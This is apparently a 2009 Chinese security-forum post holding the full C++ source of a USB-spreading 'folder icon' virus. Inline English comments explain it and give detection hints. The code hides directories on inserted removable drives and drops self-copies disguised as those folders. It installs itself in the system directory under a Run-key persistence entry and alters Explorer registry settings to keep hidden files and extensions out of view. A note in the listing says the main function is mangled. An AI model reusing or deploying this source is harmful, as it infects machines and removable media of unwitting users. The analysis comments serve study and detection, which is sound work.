[原创]文件夹图标病毒


    /*文章作者:ALALMN JACK    BLOG  http://hi.baidu.com/alalmn   QQ316118740
    信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

    在邪八看到这个  ([原创]文件夹图标病毒以及专杀的实现)     呵呵
    我们学校也有  我也中过  挺有意思的   我下载下来  一直没看代码
    过年的时候刚好有时间看了下   发现很多问题(BUG)  后来给作者说下自己又改下  现在发布下
    2009/1/27     */


    #include "stdafx.h"
    #include <windows.h>
    #include "resource.h"  
    /////////////////////////////////////////////////////
    // Propagation routine (analysis note; code left as-is). For the drive
    // root passed in DriveBuf it walks the top-level entries matching "*.*",
    // marks every directory that is not already system/hidden as
    // HIDDEN|SYSTEM, and writes a copy of the running executable at
    // "<directory path>.exe" — the fake "folder" the post title refers to.
    // Only the top level of the drive is visited; there is no recursive call.
    // Detection hint: directories on removable media that suddenly carry
    // HIDDEN|SYSTEM next to a same-named .exe are the artifact to look for.
    VOID DoBad(char DriveBuf[]);
    VOID DoBad(char DriveBuf[]) 
    {
     CFileFind finder;
     // build a string with wildcards
     CString strWildcard(DriveBuf);
     strWildcard += _T("*.*");
     char FileSource[MAX_PATH]={0}; 
     char FileNew[MAX_PATH]={0};
     HMODULE hModule=GetModuleHandle(NULL); 
     // FileSource = full path of this process's own image (what gets copied)
     GetModuleFileName(hModule,FileSource,MAX_PATH); 
     CloseHandle(hModule);  
     // start working for files
     BOOL bWorking = finder.FindFile(strWildcard); 
     while (bWorking)
     {
      bWorking = finder.FindNextFile();
      if (finder.IsDots()) 
       continue;
      // directories only, and only those not already system/hidden
      // (the original comment said "recursively search it", but nothing recurses)
      if (finder.IsDirectory()&&!finder.IsSystem()&&!finder.IsHidden())
      {       
       // hide the real directory; skip it if the attribute change fails
       if(!SetFileAttributes(finder.GetFilePath(),FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))  //| FILE_ATTRIBUTE_SYSTEM
        continue; 
       // decoy path: "<directory path>.exe", a copy of this executable
                sprintf(FileNew,"%s%s",finder.GetFilePath(),".exe");
       CopyFile(FileSource,FileNew,TRUE); 
      }
     }
     finder.Close();
    }
    /////////////////////////////////////////////////////
    #include <dbt.h>
    // Drive-root scratch buffer ("X:\" plus NUL), filled in OnDeviceChange.
    char diskPath[5] = { 0 };
    // WM_DEVICECHANGE handler (analysis note). On DBT_DEVICEARRIVAL it walks
    // the GetLogicalDrives() bitmask, shifting it right once per iteration and
    // building a root path from 'C'+i for each set bit; the first root that is
    // DRIVE_REMOVABLE and answers GetVolumeInformation is handed to DoBad,
    // after which the loop stops. On DBT_DEVICEREMOVECOMPLETE it only shows a
    // message box (title "病毒提示!" ~ "virus notice", text "停止U盘" ~ "USB
    // drive stopped"). lpdb is assigned but never read. Always returns a
    // value-initialised LRESULT.
    // Detection hint: the message-box strings are a visible artifact of this sample.
    LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam);
    LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
    {
    // char U[4];
     PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
     DWORD allDisk = GetLogicalDrives();
     if (allDisk!=0)
     {
     switch(wParam)
     {
     case DBT_DEVICEARRIVAL:
      {
      for (int i=0;i<40;i++)
      {
       if ((allDisk & 1)==1)
       {
        // diskPath <- "<letter>:\"
        sprintf(diskPath, "%c", 'C'+i ); 
        strcat(diskPath, ":\\" );
        
        if (GetDriveType(diskPath)==DRIVE_REMOVABLE )
        {
         // only a mounted, readable volume is touched
         if( GetVolumeInformation(diskPath,0,0,0,0,0,0,0) )
         {
          //MessageBox( NULL,diskPath, "1",MB_OK );
          DoBad(diskPath);
          break;  // at most one drive per arrival event
         }
        }
       }
       allDisk = allDisk>>1;
      }
      }
     break;
     case DBT_DEVICEREMOVECOMPLETE:
      MessageBox( NULL,"停止U盘", "病毒提示!",MB_OK );
     break;
     }
     }
     return LRESULT();
    }

    // Window procedure for the hidden window created in CreateMyWindow.
    // WM_DEVICECHANGE is forwarded to OnDeviceChange (the only real work).
    // WM_CLOSE and WM_DESTROY return FALSE without calling PostQuitMessage,
    // so closing or destroying the window does not end the message loop;
    // everything else goes to DefWindowProc.
    LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam);
    LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
    {
     switch(message)
     {
     case WM_CREATE:
      break;
     case WM_DEVICECHANGE:
    //  if(modify_data.IsUpan)
       OnDeviceChange(hWnd,wParam,lParam);
      break;
     case WM_CLOSE:
      return FALSE;  // swallowed: no PostQuitMessage
     case WM_DESTROY:
      return FALSE;  // swallowed: no PostQuitMessage
     default:
      return DefWindowProc(hWnd,message,wParam,lParam);
     }
     return 0;
    }

    // Registers window class "WebDown", creates a top-level window titled
    // "hacker", hides it immediately (SW_HIDE), sends itself a single
    // WM_DEVICECHANGE with wParam/lParam 0, then pumps messages until
    // GetMessage returns 0 — which, given WndProc above, closing the window
    // never causes. Returns 1 after the loop.
    // Detection hint: a hidden window with class "WebDown" / title "hacker"
    // is a runtime artifact of this sample.
    int CreateMyWindow();
    int CreateMyWindow()
    {
     MSG msg;
     WNDCLASS wndc;
     LPSTR szAppName="WebDown";
     wndc.style=0;
     wndc.lpfnWndProc=WndProc;  
     wndc.cbClsExtra=0;
     wndc.cbWndExtra=0;
     wndc.hInstance=NULL;
     wndc.hIcon=NULL;
     wndc.hCursor=NULL;
     wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
     wndc.lpszMenuName=NULL;
     wndc.lpszClassName=szAppName;
     RegisterClass(&wndc);
     HWND hWnd=CreateWindow(szAppName,"hacker",
      WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,CW_USEDEFAULT,
      CW_USEDEFAULT,CW_USEDEFAULT,NULL,NULL,NULL,NULL);
     // the window exists only to receive WM_DEVICECHANGE; it is never shown
     ShowWindow(hWnd,SW_HIDE);
     UpdateWindow(hWnd); 
     
     // synchronous self-notification (wParam 0) before entering the loop
     SendMessage(hWnd,WM_DEVICECHANGE,0,0);
     
     while(GetMessage(&msg,NULL,0,0))
     {
      TranslateMessage(&msg);
      DispatchMessage(&msg);
     }
     return 1;
    }

    /////////////////////////////////////////////////////
    // Recursively deletes registry key lpSubKey under hKey: opens it with
    // KEY_ALL_ACCESS, enumerates index 0 and recurses into that subkey until
    // enumeration stops succeeding, closes the handle, then RegDeleteKey's the
    // key itself. Both "return lResult" lines are commented out, so an
    // RegOpenKeyEx failure is not propagated and the function carries on.
    // In this sample FuckReg uses it to strip the NOHIDDEN / SHOWALL subkeys
    // beneath Explorer's Folder\Hidden option.
    void DeleteSubKeyTree(HKEY hKey, LPCTSTR lpSubKey);
    void DeleteSubKeyTree(HKEY hKey, LPCTSTR lpSubKey) 
    {
     LONG lResult;
     HKEY hSubKey;
     DWORD   dwIndex, cbName;
     char   szSubKey[512];
     FILETIME   ft;
     lResult   =   RegOpenKeyEx(hKey,   lpSubKey,   0,   KEY_ALL_ACCESS,&hSubKey);
     if (lResult != ERROR_SUCCESS)
     {
      RegCloseKey(hSubKey);
      //  return lResult;
     }
     dwIndex = 0;
     cbName = sizeof(szSubKey)/sizeof(szSubKey[0]);
     // dwIndex stays 0: each pass deletes the current first subkey
     while (ERROR_SUCCESS == (lResult = RegEnumKeyEx(hSubKey, dwIndex, szSubKey, &cbName, NULL, NULL, NULL, &ft)))
     {
      DeleteSubKeyTree(hSubKey, szSubKey);
     }
     RegCloseKey(hSubKey);
     lResult = RegDeleteKey(hKey, lpSubKey);
     // return lResult;
    }


    // Registry tampering that keeps the hidden directories and the ".exe"
    // suffix out of sight (analysis note; code left as-is):
    //  1. HKLM\...\Explorer\Advanced\Folder\Hidden: sets "Text" to a Chinese
    //     string (roughly "this machine is infected - test program - JACK"),
    //     presumably the label Folder Options shows for that setting;
    //  2. deletes the NOHIDDEN and SHOWALL subkeys beneath it via
    //     DeleteSubKeyTree, presumably removing the show/hide choices;
    //  3. HKCU\...\Explorer\Advanced: HideFileExt = 1 (REG_DWORD), Explorer's
    //     "hide extensions" setting, so "<name>.exe" displays as "<name>".
    // Mitigation: recovering Folder Options means restoring these keys and
    // values, not just deleting the dropped executables.
    void FuckReg();
    void FuckReg() 
    {
     HKEY hKey; 
     RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden",&hKey); 
        TCHAR *valueA=_T("机器已经中毒了  本程序测试使用—JACK");
     RegSetValueEx(hKey, "Text", NULL, REG_SZ, (LPBYTE)valueA, (DWORD) (lstrlen(valueA)+1));
     RegCloseKey(hKey); 
     
     LPCTSTR lpSubKey1= "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN";
     HKEY hKey1 = HKEY_LOCAL_MACHINE;
     DeleteSubKeyTree(hKey1, lpSubKey1);
     
     LPCTSTR lpSubKey2= "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL";
     HKEY hKey2 = HKEY_LOCAL_MACHINE;
     DeleteSubKeyTree(hKey2, lpSubKey2);
     
     HKEY hKey3; 
     RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",&hKey3); 
     DWORD valueA3=1;
     RegSetValueEx(hKey3, "HideFileExt", NULL, REG_DWORD, (CONST BYTE *)(&valueA3),4);
     RegCloseKey(hKey3);  // close handle
    }
    /////////////////////////////////////////////////////

    #include   <shellapi.h>
    #pragma comment(linker, "/ALIGN:4096")
    #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
    // Entry point (the linker pragma above builds a GUI-subsystem binary, so
    // no console is shown). Sequence as written (analysis note):
    //  1. derive a folder path from the executable's own name and open it in
    //     Explorer — the lure: the fake "folder" still appears to open;
    //  2. create the mutex "ALALMN JACK 只做测试使用!!" (~ "for testing only")
    //     and exit if it already exists (single-instance guard);
    //  3. copy itself to "<GetSystemDirectory()>\hacker.exe" and write that
    //     path as value "hacker--JACK" under HKLM\...\CurrentVersion\Run
    //     (persistence at logon);
    //  4. FuckReg() for the Explorer registry changes, then CreateMyWindow(),
    //     whose message loop does not return normally.
    // NOTE(review): the listing looks mangled around the mutex check and the
    // Run-key block — blank lines sit where braces appear to have been, and
    // as pasted the "}" after ExitProcess closes main, leaving the remaining
    // statements at file scope; treat that as a transcription loss.
    // Detection hints: the mutex name, the Run value "hacker--JACK", and a
    // hacker.exe in the system directory are all artifacts of this sample.
    int main()
    {
    //////////////////////////////////////
    char fullPath[MAX_PATH]; 
    HMODULE hModule=GetModuleHandle(NULL);  
    GetModuleFileName(hModule, fullPath,MAX_PATH);
    CString strPath=(CString)fullPath;
    int ret=strPath.ReverseFind(_T('.exe'));  
    // the real folder this decoy stands in for (same name, no extension)
    CString path=strPath.Left(ret-3)+_T("\\"); 
    //    MessageBox(path);   
        ShellExecute(NULL,"explore",path,NULL,NULL,SW_SHOWNORMAL);
    // ShellExecute(NULL,"open",NULL,NULL,path,SW_SHOWNORMAL);

    // single-instance guard keyed on a fixed mutex name
    HANDLE m_hMutex=CreateMutex(NULL,FALSE,"ALALMN JACK 只做测试使用!!");
    if(GetLastError()==ERROR_ALREADY_EXISTS)

     CloseHandle(m_hMutex);
     m_hMutex=NULL;
     ExitProcess(0);
    }
    /////////////////////////// 
    char FileSource[MAX_PATH]={0};
    char FileNew[MAX_PATH]={0};
    HMODULE hModule1=GetModuleHandle(NULL);
    GetModuleFileName(hModule1,FileSource,MAX_PATH);
    CloseHandle(hModule1);
    // drop location: "<system directory>\hacker.exe"
    GetSystemDirectory(FileNew,MAX_PATH);
    strcat(FileNew,"\\hacker.exe");
    /////////////////////////// 
    CopyFile(FileSource,FileNew,TRUE);
    // persistence: Run key under HKLM
    HKEY hkey=HKEY_LOCAL_MACHINE;  
    char lpSubKey[256]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";  
    HKEY phkResult;
    int len=sizeof(FileNew); 
    if(::RegOpenKeyEx(hkey,lpSubKey,0,KEY_ALL_ACCESS,&phkResult)!=ERROR_SUCCESS) 
    {
     ::RegCreateKeyEx(hkey,lpSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_WRITE,NULL,&phkResult,NULL); 

    if (RegQueryValueEx(hkey,lpSubKey,NULL,NULL,(unsigned char *)&FileNew,(unsigned long *)&len)!=ERROR_SUCCESS)  
     ::RegSetValueEx(phkResult,"hacker--JACK",0,REG_SZ,(LPBYTE)FileNew, (DWORD)(lstrlen(FileNew)+1)); 
    ::RegCloseKey(phkResult); 
    /////////////////////////// 
    FuckReg(); 
    CreateMyWindow(); 
    //-------------------------
    //while (1)   // infinite loop so the main thread does not exit
    //{
    // Sleep(1000);
    //}
    //---------------------
    return 0;
    }
